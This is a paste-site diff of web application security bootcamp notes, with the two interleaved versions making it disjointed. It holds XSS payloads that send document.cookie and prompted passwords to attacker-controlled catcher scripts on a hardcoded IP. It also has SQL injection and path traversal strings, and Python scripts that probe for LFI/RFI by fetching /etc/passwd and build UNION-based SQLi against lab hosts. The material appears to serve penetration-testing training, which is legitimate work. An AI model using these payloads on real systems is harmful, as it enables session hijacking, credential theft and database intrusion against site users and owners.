388		Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
389
390		4. Now replace that alert script with:
391
392		<script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
393
394
395	-	Option 1
395	+
396	-	--------
396	+
397
398		5. Now view the stolen cookie at:
399		---------------------------Paste this into Firefox-----------------------------------
400	-	document.write("<img src=\"http://54.172.112.249/xss_practice/passwordgrabber.php?password=" +password+"\">");
400	+	http://45.63.104.73/xss_practice/cookie_stealer_logs.html
401		-------------------------------------------------------------------------------------
402
403		The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
404
405	-	http://54.172.112.249/xss_practice/passwords.html
405	+
406
407
408
409	-	Option 2
409	+
410	-	--------
410	+
411		# A Better Way To Demo XSS #
412	-	username=prompt('Please enter your username',' ');
412	+
413	-	password=prompt('Please enter your password',' ');
413	+
414	-	document.write("<img src=\"http://54.172.112.249/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
414	+
415		Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
416
417
418		Use Firefox to browse to the following location:
419		---------------------------Paste this into Firefox-----------------------------------
420		http://45.63.104.73/xss_practice/
421	-	http://54.172.112.249/xss_practice/username_password_logs.html
421	+	-------------------------------------------------------------------------------------
422
423
424		Paste this in the search box
425		----------------------------
426	-	#########################################
426	+
427	-	# Let's kick it up a notch with ASP.NET #
427	+
428	-	# http://54.200.178.220/ #
428	+
429	-	#########################################
429	+
430		password=prompt('Your session is expired. Please enter your password to continue',' ');
431		document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
432	-	The trading Web App is on http://54.200.178.220/
432	+
433
434
435	-	Try the following in the search box:
435	+
436	-	<script>alert(123);</script>
436	+	---------------------------Paste this into Firefox-----------------------------------
437	-	' or 1=1
437	+	http://45.63.104.73/xss_practice/passwords.html
438	-	' and a=a
438	+	-------------------------------------------------------------------------------------
439	-	1=1
439	+
440	-	Joe'+OR+1=1;--
440	+
441
442		###############################################################
443	-	<script>alert(123);</script>
443	+	# Question 1: What is the process that you use when you test? #
444	-
444	+	###############################################################
445	-	Open a new tab in firefox and try this:
445	+
446	-	http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName
446	+	Step 1: Automated Testing
447
448		Step 1a: Web Application vulnerability scanners
449	-	Try the contact us form.
449	+	-----------------------------------------------
450	-	Open a new tab in firefox and try this:
450	+	- Run two (2) unauthenticated vulnerability scans against the target
451	-	http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini
451	+	- Run two (2) authenticated vulnerability scans against the target with low-level user credentials
452		- Run two (2) authenticated vulnerability scans against the target with admin privileges
453	-	Try this on the inquiry form:
453	+
454	-	Joe McCray
454	+	The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).
455	-	1234567890
455	+
456	-	joe@strategicsec.com') waitfor delay '00:00:10'--
456	+	A good web application vulnerability scanner comparison website is here:
457		http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
458
459	-	Login Box:
459	+
460		Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
461	-	' or 1=1 or ''='
461	+
462	-	anything (click login instead of pressing enter)
462	+	When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
463
464
465		Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
466	-	Tamper Data: (notice 2 session IDs)
466	+
467
468	-	AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
468	+	Also, be sure to save the scan results and logs. I usually provide this data to the customer.
469	-	IsAdmin=yes;
469	+
470	-	ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
470	+
471
472		Step 1b: Directory Brute Forcer
473		-------------------------------
474	-	Profile - Detail (tamper data)
474	+	I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
475	-	Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
475	+
476	-	joe\|set
476	+
477
478		Step 2: Manual Testing
479	-	xss_upload.txt (Upload Bulk Order)
479	+
480	-	<script>alert(123);</script>
480	+	Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).
481
482		Step 2a: Spider/Scan the entire site with Burp Suite
483		Save the spider and scan results. I usually provide this data to the customer as well.
484
485
486		Step 2b: Browse through the site using the 3 question method
487		Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
488	-	# More Course Materials #
488	+
489		Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
490
491	-	Slides:
491	+	Here is what I mean:
492	-	https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/WebAppSecIsNotEasyButCanBeSimple.pptx
492	+	http://www.site.com/page.aspx?parametername=parametervalue
493	-	https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/Burp+Suite.pptx
493	+
494		When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
495
496	-	Lab Manual:
496	+	http://www.site.com/page.aspx?parametername=[ payload ]
497	-	https://s3.amazonaws.com/StrategicSec-Files/BurpSuiteBootcamp/BurpSuite-Bootcamp-v1.pdf
497	+
498		You need to ensure that you send the payload this way, and like this below:
499
500	-	Day 1 Video:
500	+	http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
501	-	https://s3.amazonaws.com/StrategicSec-Videos/2015/2015-12-06+09.10+Burp+Suite+Weekend+Bootcamp.mp4
501	+
502		This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
503
504	-	Day 1 Homework:
504	+
505
506
507	-	Day 1 Challenge (Due 12 December):
507	+
508	-	Use Burp Suite to demonstrate with screenshots and explanations of how to test for the all of the OWASP Top 10 vulnerabilities against your choice of targets the following targets:
508	+
509	-	http://strategicsec.com
509	+
510	-	http://54.213.252.28/
510	+	###########################################
511	-	http://54.172.112.249/
511	+	# Question 2: How much fuzzing is enough? #
512	-	http://54.200.178.220/
512	+	###########################################
513	-	http://54.213.131.105/
513	+
514
515	-	Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Burp-Suite-Bootcamp-Day1-Challenge.docx)
515	+
516
517
518		Step 1: Ask yourself the 3 questions per page of the site.
519	-	Day 2 Video:
519	+
520	-	https://s3.amazonaws.com/StrategicSec-Videos/2015/2015-12-13+09.25+Burp+Suite+Weekend+Bootcamp.mp4
520	+
521
522		Step 3: When you load your fuzz strings - use the following decision tree
523	-	Day 2 Challenge (Due 19 December):
523	+
524	-	----------------------------------
524	+
525	-	Use the StrategicSec Ubuntu VM to demonstrate how to install, configure, and use at least five (5) of the following Burp Suite extensions from these websites and lists below:
525	+
526	-	https://github.com/integrissecurity/carbonator
526	+
527	-	https://github.com/allfro/BurpKit
527	+
528	-	https://github.com/nccgroup/BurpSuiteLoggerPlusPlus
528	+
529	-	https://github.com/Quitten/Autorize
529	+
530	-	https://github.com/codewatchorg/sqlipy
530	+
531	-	https://github.com/augustd/burp-suite-token-fetcher
531	+
532	-	https://github.com/augustd/burp-suite-gwt-scan
532	+
533		- Some example strings that I use are:
534	-	https://webbreacher.wordpress.com/2015/07/25/my-favorite-burp-suite-extensions/
534	+
535	-	http://bughunting.guide/the-top-5-burp-suite-extensions/
535	+
536	-	https://www.codemagi.com/downloads/
536	+
537		(5-1) <----- See if you can perform an arithmetic function
538
539
540	-	You must use them against your choice of targets the following targets:
540	+
541	-	http://strategicsec.com
541	+
542	-	http://54.213.252.28/
542	+
543	-	http://54.172.112.249/
543	+
544	-	http://54.200.178.220/
544	+
545	-	http://54.213.131.105/
545	+
546		<script>alert(xss);</script>
547	-	Submit the results via email in an MS Word document with (naming convention example:
547	+
548	-	YourFirstName-YourLastName-Burp-Suite-Bootcamp-Day2-Challenge.docx)
548	+
549
550
551	-	# Setting up Burp Suite #
551	+
552
553	-	Download latest free version of Burp at http://www.portswigger.net/burp/download.html
553	+
554	-	Make sure that burpsuite_free_v1.6.31.jar is set as executable (chmod +x burpsuite_free_v1.6.31.jar) and then run:
554	+
555
556	-	java -jar burpsuite_free_v1.6.31.jar
556	+	-------------------------------------------------------------------------------------------
557
558	-	- Click the "Proxy" tab
558	+
559	-	- Click the "Options" sub tab
559	+
560	-	- Click “Edit” in the “Proxy Listeners” section
560	+	# Web App Scripting Basics #
561	-	- In the “Edit proxy listener” pop up select “Binding Tab” select “loopback only”
561	+
562	-	- In the same pop up make sure that the bind port is 8080
562	+
563	-	- In the same pop up select the “Certificate” tab
563	+	1. Simple LFI/RFI
564	-	- Ensure that burp is configured to "generate CA-signed per-host certificates"
564	+	-----------------
565
566	-	Open Firefox
566	+	vi lfi-rfi.py
567	-	- Click "Edit"
567	+	--------------------------------
568	-	- Click “Preferences"
568	+	#!/usr/bin/env python
569	-	- Click the "Advanced" tab
569	+
570	-	- Click the "Network" sub tab
570	+	print "\n### PHP LFI/RFI Detector ###"
571	-	- Click the connection "settings" button
571	+
572	-	- Click "manual proxy configuration"
572	+
573	-	set it to 127.0.0.1 port 8080
573	+	# urllib2 is a Python module that can be used for fetching URLs. It defines functions and classes to help with URL actions (basic and digest authentication, redirections, cookies, etc) The magic starts with importing the urllib2 module.
574	-	check "Use this proxy server for all protocols"
574	+
575	-	- Remove both the "localhost, 127.0.0.1" text from the "No Proxy For:" line
575	+	# The module re provides full support for Perl-like regular expressions in Python
576
577		# The module sys contains System-specific parameters and functions
578	-	Configure your browser to use Burp as its proxy, and configure Burp's proxy listener to generate CA-signed per-host certificates.
578	+
579
580	-	Visit any SSL-protected URL.
580	+	import urllib2,re,sys
581
582	-	On the “This Connection is Untrusted” screen, click on “Add Exception”
582	+	TARGET = "http://45.63.104.73/showfile.php?filename=about.txt"
583	-	Click "Get Certificate", then click "View".
583	+	RFIVULN = "https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt?"
584		TravLimit = 12
585	-	In the “Details” tab, select the root certificate in the tree (PortSwigger CA).
585	+
586		print "==> Testing for LFI vulns.."
587	-	Click "Export" and save the certificate as "BurpCert" on the Desktop.
587	+	TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION
588		for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP
589	-	Close Certificate Viewer dialog and click “Cancel” on the “Add Security Exception” dialog
589	+	TARGET += "../"
590	-	Go to Edit \| Preferences
590	+	try:
591	-	Click “Advanced” and go to “Certificates” tab
591	+	source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
592	-	Click “View Certificates”
592	+	except urllib2.URLError, e:
593		print "$$$ We had an Error:",e
594	-	Click "Import" and select the certificate file that you previously saved.
594	+	sys.exit(0)
595		if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
596	-	On the "Downloading Certificate" dialog, check the box "Trust this CA to identify web sites", and click "OK".
596	+	print "!! ==> LFI Found:",TARGET+"etc/passwd"
597		break ## BREAK LOOP WHEN VULN FOUND
598	-	Close all dialogs and restart Firefox
598	+
599		print "\n==> Testing for RFI vulns.."
600		TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION
601		try:
602	-	# How much fuzzing is enough? #
602	+	source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
603		except urllib2.URLError, e:
604		print "$$$ We had an Error:",e
605		sys.exit(0)
606		if re.search("Hello world",source): ## SEARCH FOR TEXT IN SOURCE
607		print "!! => RFI Found:",TARGET
608
609		print "\nScan Complete\n" ## DONE
610
611		--------------------------------
612
613
614
615
616		2. Simple SQL Injection
617		-----------------------
618
619		vi sqli.py
620		--------------------------------
621		#!/usr/bin/env python
622		print "\n### PHP SQLi Detector ###"
623		import urllib2,re,sys
624
625		TARGET = "http://45.63.104.73/acre2.php?lap=acer"
626
627		SQLi = "%27"
628		SQLiError = "You have an error in your SQL"
629		myNameInHex = "0x6a6f65"
630		myName = 'joe'
631
632		print "==> Testing for SQLi Error Vuln..."
633		URL = TARGET+SQLi
634		try:
635		source = urllib2.urlopen(URL).read() ## WEB REQUEST
636		except urllib2.URLError, e:
637		print "$$$ We had an Error\n",e
638		sys.exit(0)
639		if re.search(SQLiError,source): ## SEARCH FOR ERROR IN PAGE
640		print "!! ==> SQLi Found:",TARGET+SQLi
641		print "## ==> Bruting NULL column...",
642	-
642	+	URL = TARGET+SQLi+"%20UNION%20SELECT%20"+myNameInHex ## BUILD OUR SQLi STATEMENT
643		for x in xrange(1,10):
644		if x > 1:
645		URL = URL+","
646		URL = URL+myNameInHex
647	-	# Trading Web App with WAF #
647	+	print x,
648	-	# http://54.213.131.105 #
648	+	print URL
649		try:
650		source = urllib2.urlopen((URL+"--%20j")).read() ## WEB REQUEST
651		except urllib2.URLError, e:
652	-	Try the following in the search box:
652	+	print "$$$ We had an Error\n",e
653	-	<script>alert(123);</script>
653	+	sys.exit(0)
654	-	<script>alert(123);</script
654	+	if re.search(myName, source): ## SEARCH FOR UNENCODED NULL WORD
655	-	<script>alert(123)
655	+	print "\n!! ==> Null Column Found:",URL+"--"
656	-	<script>alert
656	+	break
657	-	<script>
657	+	else:
658	-	<script
658	+	print "** ==> No SQLi Found!"
659	-	<scrip
659	+	print "\nScan Complete\n"
660	-	<scri
660	+	--------------------------------

Public Pastes

Convert_Dictionary to DataTable
C# | 4 min ago | 0.78 KB
snowybot glitch avoided april 27 2024
JavaScript | 6 min ago | 3.11 KB
snowybot trial run completed april 27 2024
JavaScript | 12 min ago | 3.20 KB
Untitled
C++ | 13 min ago | 0.67 KB
🤑 G2A.com Free Gift Card Guide Apr 2024 FIX 💰
GetText | 25 min ago | 0.38 KB
snowybot manual April 27 2024
JavaScript | 33 min ago | 3.23 KB
🤑 G2A.com Free Gift Card Guide Apr 2024 FIX 🤑
GetText | 57 min ago | 0.39 KB
psi patch
C++ | 1 hour ago | 4.83 KB